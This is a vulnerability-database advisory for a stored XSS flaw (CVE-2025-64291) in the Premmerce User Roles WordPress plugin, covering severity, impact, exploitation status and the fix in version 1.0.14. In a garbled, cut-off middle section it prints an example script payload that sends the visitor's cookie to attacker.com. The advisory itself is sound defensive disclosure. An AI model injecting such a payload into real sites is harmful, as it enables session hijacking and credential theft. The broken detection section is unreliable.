
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-64291 is a Stored Cross-Site Scripting (XSS) vulnerability in the Premmerce User Roles WordPress plugin, affecting all versions up to and including 1.0.13. The vulnerability was reported by security researcher Nabil Irawan on April 10, 2025, disclosed publicly on May 10, 2025 via Patchstack, and assigned a CVE on October 29, 2025. It carries a CVSS v3.1 base score of 5.9 (Medium), requiring high privileges and user interaction for exploitation (Patchstack).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), a Stored XSS flaw in the Premmerce User Roles plugin for WordPress. An attacker with Administrator-level privileges can inject malicious scripts into plugin-controlled fields that are subsequently stored in the database and rendered to other users visiting affected pages. Exploitation requires user interaction — a privileged user must trigger the stored payload, for example by visiting an admin page where the malicious content is rendered. No public proof-of-concept code has been identified (Patchstack).
Successful exploitation allows an attacker to inject and persistently store malicious JavaScript or HTML payloads within the WordPress site, which are then executed in the browsers of users who visit affected pages. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of victims, or redirection to malicious sites. The scope is changed (S:C in CVSS terms), meaning the impact can extend beyond the plugin itself to affect site visitors and other authenticated users (Patchstack).
There is no known public exploit code, active in-the-wild exploitation, or threat actor attribution associated with CVE-2025-64291. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack classifies this as low priority with no impactful threat currently observed (Patchstack).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable input field and save the configuration.wp_options table) containing script tags or encoded JavaScript.The vendor has released version 1.0.14 of the Premmerce User Roles plugin, which patches this vulnerability. Site administrators should update the plugin to version 1.0.14 or later immediately via the WordPress plugin dashboard. Patchstack users can enable auto-update for vulnerable plugins as an additional safeguard. If an immediate update is not possible, restrict access to the WordPress admin panel to trusted IP addresses and limit the number of accounts with Administrator privileges (Patchstack).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."